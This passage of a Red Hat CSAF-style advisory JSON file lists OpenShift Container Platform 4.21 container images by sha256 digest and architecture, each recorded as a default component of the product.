"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:c11fd98702ea065a5addcf840a6144d9df3f7f3bc4901fb3d9873b72f773ccc0_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:c11fd98702ea065a5addcf840a6144d9df3f7f3bc4901fb3d9873b72f773ccc0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:c11fd98702ea065a5addcf840a6144d9df3f7f3bc4901fb3d9873b72f773ccc0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:e0fcb23ee5c2635b54bf9c2b3b29d4f2bb1eb237db7ac2c0cc01be4dcb087fdd_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:e0fcb23ee5c2635b54bf9c2b3b29d4f2bb1eb237db7ac2c0cc01be4dcb087fdd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:e0fcb23ee5c2635b54bf9c2b3b29d4f2bb1eb237db7ac2c0cc01be4dcb087fdd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:21a29815d5d3fd34632ef852217f63319e3d5fdec795fae749e38d6381c29c15_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:21a29815d5d3fd34632ef852217f63319e3d5fdec795fae749e38d6381c29c15_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:21a29815d5d3fd34632ef852217f63319e3d5fdec795fae749e38d6381c29c15_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:3c2ae4e3bd8501436ec135700a13a6ed29ad6080cd151fd932646639787148a0_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:3c2ae4e3bd8501436ec135700a13a6ed29ad6080cd151fd932646639787148a0_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:3c2ae4e3bd8501436ec135700a13a6ed29ad6080cd151fd932646639787148a0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:a6c7b7806fe1443ead913b7ea3cde3f768626d9dcb09089f60de3aa8c3681ff5_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:a6c7b7806fe1443ead913b7ea3cde3f768626d9dcb09089f60de3aa8c3681ff5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:a6c7b7806fe1443ead913b7ea3cde3f768626d9dcb09089f60de3aa8c3681ff5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:ff3f16308fcee12fe291fdc043366343c88bd30b9b449b646e548d36d3872077_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:ff3f16308fcee12fe291fdc043366343c88bd30b9b449b646e548d36d3872077_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:ff3f16308fcee12fe291fdc043366343c88bd30b9b449b646e548d36d3872077_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:20d0529049b4723cc2ee5a4996b751369d23ed770333a0e2710e0b7d74bbc46f_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:20d0529049b4723cc2ee5a4996b751369d23ed770333a0e2710e0b7d74bbc46f_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:20d0529049b4723cc2ee5a4996b751369d23ed770333a0e2710e0b7d74bbc46f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:890269820c3fd7d222f60758203acb844003ad14b90c143dbd4a50790143947b_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:890269820c3fd7d222f60758203acb844003ad14b90c143dbd4a50790143947b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:890269820c3fd7d222f60758203acb844003ad14b90c143dbd4a50790143947b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:9774825c7f2e8541d9c3b03d1870add013b974b1a52224b08cf5ce3894d473d7_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:9774825c7f2e8541d9c3b03d1870add013b974b1a52224b08cf5ce3894d473d7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:9774825c7f2e8541d9c3b03d1870add013b974b1a52224b08cf5ce3894d473d7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:e52888476811447f15ac1a8aa5aa7c6a0610c27cfe996736b136027a475553a5_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:e52888476811447f15ac1a8aa5aa7c6a0610c27cfe996736b136027a475553a5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:e52888476811447f15ac1a8aa5aa7c6a0610c27cfe996736b136027a475553a5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:24e26ccdf054e4828cbf3196512d84304dca7c344219c979724e7d37a831c590_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:24e26ccdf054e4828cbf3196512d84304dca7c344219c979724e7d37a831c590_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:24e26ccdf054e4828cbf3196512d84304dca7c344219c979724e7d37a831c590_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:7bfcdd17d86d7585ffc6f25d4975e44b33ea51523f8afc27bace574b4da61ed1_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:7bfcdd17d86d7585ffc6f25d4975e44b33ea51523f8afc27bace574b4da61ed1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:7bfcdd17d86d7585ffc6f25d4975e44b33ea51523f8afc27bace574b4da61ed1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:9654c56daa0f42106d3a0ef75b134e4f8fa758894e1941548d122ff94b3677ca_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:9654c56daa0f42106d3a0ef75b134e4f8fa758894e1941548d122ff94b3677ca_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:9654c56daa0f42106d3a0ef75b134e4f8fa758894e1941548d122ff94b3677ca_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:e42fe14cfdf9c0a44404d009b1a42d7f1484316c227f3c480c8d0568cb41ef8c_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:e42fe14cfdf9c0a44404d009b1a42d7f1484316c227f3c480c8d0568cb41ef8c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:e42fe14cfdf9c0a44404d009b1a42d7f1484316c227f3c480c8d0568cb41ef8c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:08ef837af0a9a51853c9f7fb17e98a834f1bc4b09b0dd06944b51fc88cdb532f_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:08ef837af0a9a51853c9f7fb17e98a834f1bc4b09b0dd06944b51fc88cdb532f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:08ef837af0a9a51853c9f7fb17e98a834f1bc4b09b0dd06944b51fc88cdb532f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:568557a3b1c4c0f276e2c118e1ce052880a7f8941459b20a2ab84baf23085fec_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:568557a3b1c4c0f276e2c118e1ce052880a7f8941459b20a2ab84baf23085fec_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:568557a3b1c4c0f276e2c118e1ce052880a7f8941459b20a2ab84baf23085fec_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:ccc0e2cd71654109461a0304fc7f03fd1cb6232598a77c04ce4d62e9b8ce0fa6_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:ccc0e2cd71654109461a0304fc7f03fd1cb6232598a77c04ce4d62e9b8ce0fa6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:ccc0e2cd71654109461a0304fc7f03fd1cb6232598a77c04ce4d62e9b8ce0fa6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d40a51c40a9a37a20234160b94a1bf080cc07bdadfc3d53620fb59640a155e29_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d40a51c40a9a37a20234160b94a1bf080cc07bdadfc3d53620fb59640a155e29_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d40a51c40a9a37a20234160b94a1bf080cc07bdadfc3d53620fb59640a155e29_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:06651a72194c592504a75661234d93a2d81d6d54fc53ce58cc4d62f6e5344fac_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:06651a72194c592504a75661234d93a2d81d6d54fc53ce58cc4d62f6e5344fac_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:06651a72194c592504a75661234d93a2d81d6d54fc53ce58cc4d62f6e5344fac_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:476478ca6f4d476333feb32ad72d78df98357a02dfe1a488d10d6d7aac05e50e_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:476478ca6f4d476333feb32ad72d78df98357a02dfe1a488d10d6d7aac05e50e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:476478ca6f4d476333feb32ad72d78df98357a02dfe1a488d10d6d7aac05e50e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:576ac2c2f80e7dc444be492df64d27145b626dc627bafe4d04c4dc3b464ee653_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:576ac2c2f80e7dc444be492df64d27145b626dc627bafe4d04c4dc3b464ee653_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:576ac2c2f80e7dc444be492df64d27145b626dc627bafe4d04c4dc3b464ee653_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:c471ff51606f3c56eb399d1b04bb035d97d6e81c470d2971c16371aba9a6d260_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:c471ff51606f3c56eb399d1b04bb035d97d6e81c470d2971c16371aba9a6d260_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:c471ff51606f3c56eb399d1b04bb035d97d6e81c470d2971c16371aba9a6d260_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:21055d354c6b6ad8850bc85223cab6a9173633524bafe31c1031b6f8693cd7d5_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:21055d354c6b6ad8850bc85223cab6a9173633524bafe31c1031b6f8693cd7d5_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:21055d354c6b6ad8850bc85223cab6a9173633524bafe31c1031b6f8693cd7d5_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:874d83aaac6d1573874c1b1703d7e68421e7c05777b10bb42bdb9c8faf136f04_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:874d83aaac6d1573874c1b1703d7e68421e7c05777b10bb42bdb9c8faf136f04_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:874d83aaac6d1573874c1b1703d7e68421e7c05777b10bb42bdb9c8faf136f04_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8c77bc4638bb1745823c73a98ffb1d660b0d7b87aa93988a547f53bb10febea8_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8c77bc4638bb1745823c73a98ffb1d660b0d7b87aa93988a547f53bb10febea8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8c77bc4638bb1745823c73a98ffb1d660b0d7b87aa93988a547f53bb10febea8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:b73de7bc71be22699d9ea7258ed2cb2b6ec21660546ed275032bc2c297cdbf29_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:b73de7bc71be22699d9ea7258ed2cb2b6ec21660546ed275032bc2c297cdbf29_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:b73de7bc71be22699d9ea7258ed2cb2b6ec21660546ed275032bc2c297cdbf29_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:571f8f0f56ce502e2e8a6429415cca31858805d05fe0a2d2dc06e1376f5d6958_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:571f8f0f56ce502e2e8a6429415cca31858805d05fe0a2d2dc06e1376f5d6958_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:571f8f0f56ce502e2e8a6429415cca31858805d05fe0a2d2dc06e1376f5d6958_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:7973e6e926dce93531a2fce68ceb4f1a08128167b1a92f73ce82bc254e314473_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:7973e6e926dce93531a2fce68ceb4f1a08128167b1a92f73ce82bc254e314473_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:7973e6e926dce93531a2fce68ceb4f1a08128167b1a92f73ce82bc254e314473_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:83cd8f29cb94e04be62a3eebeb0b5134ab867e77cc629f6df5996f015691698b_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:83cd8f29cb94e04be62a3eebeb0b5134ab867e77cc629f6df5996f015691698b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:83cd8f29cb94e04be62a3eebeb0b5134ab867e77cc629f6df5996f015691698b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:b8e0c0d568c3167f8a409a257f0871c02f93d79ae84a6681d54ab6350177eeaa_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:b8e0c0d568c3167f8a409a257f0871c02f93d79ae84a6681d54ab6350177eeaa_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:b8e0c0d568c3167f8a409a257f0871c02f93d79ae84a6681d54ab6350177eeaa_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:02e33310f537d87191e72aa16de4bc7bbedcead6befdf0e686f9d08005df3872_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:02e33310f537d87191e72aa16de4bc7bbedcead6befdf0e686f9d08005df3872_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:02e33310f537d87191e72aa16de4bc7bbedcead6befdf0e686f9d08005df3872_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6b733ac8700fec7ab2d0c8616014903eea9e5bb58bb03ca83b1deb0e2c3ea9a3_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6b733ac8700fec7ab2d0c8616014903eea9e5bb58bb03ca83b1deb0e2c3ea9a3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6b733ac8700fec7ab2d0c8616014903eea9e5bb58bb03ca83b1deb0e2c3ea9a3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:993664caa045d8064cf2f00015af685e41ae820664ddbf7b404228095374c520_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:993664caa045d8064cf2f00015af685e41ae820664ddbf7b404228095374c520_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:993664caa045d8064cf2f00015af685e41ae820664ddbf7b404228095374c520_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:d11bece814725c67d10c4b050c11785a13bcd98115847b96e6ee984290dcd113_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:d11bece814725c67d10c4b050c11785a13bcd98115847b96e6ee984290dcd113_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:d11bece814725c67d10c4b050c11785a13bcd98115847b96e6ee984290dcd113_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5d8e93e5f498d9d364e8b50c6f6c5c70d1ac9f1506b99629ff185abf6b28d608_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5d8e93e5f498d9d364e8b50c6f6c5c70d1ac9f1506b99629ff185abf6b28d608_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5d8e93e5f498d9d364e8b50c6f6c5c70d1ac9f1506b99629ff185abf6b28d608_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:60c1cde27e89223959f2cbec07a7c1408063814897ad8cc8837ca7051e79952f_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:60c1cde27e89223959f2cbec07a7c1408063814897ad8cc8837ca7051e79952f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:60c1cde27e89223959f2cbec07a7c1408063814897ad8cc8837ca7051e79952f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cedb78beee71d3e070da1e6bd2623ab65afbe4cbee379b1617a53ecedbdfe56a_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cedb78beee71d3e070da1e6bd2623ab65afbe4cbee379b1617a53ecedbdfe56a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cedb78beee71d3e070da1e6bd2623ab65afbe4cbee379b1617a53ecedbdfe56a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cee1d005ccd6d9c94ca010bc87f3a9fbbb42425677f5a9d89f20e1752980ed5e_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cee1d005ccd6d9c94ca010bc87f3a9fbbb42425677f5a9d89f20e1752980ed5e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:cee1d005ccd6d9c94ca010bc87f3a9fbbb42425677f5a9d89f20e1752980ed5e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:29e39816ed2201098199d5dbdc5f97bb584e815a1212fcda98cc51d7fdcb7508_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:29e39816ed2201098199d5dbdc5f97bb584e815a1212fcda98cc51d7fdcb7508_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:29e39816ed2201098199d5dbdc5f97bb584e815a1212fcda98cc51d7fdcb7508_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3204209247dc1156aeb75d1c39318ec9134b83a54971069948dddef1d6b6cd12_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:3204209247dc1156aeb75d1c39318ec9134b83a54971069948dddef1d6b6cd12_amd64"
},
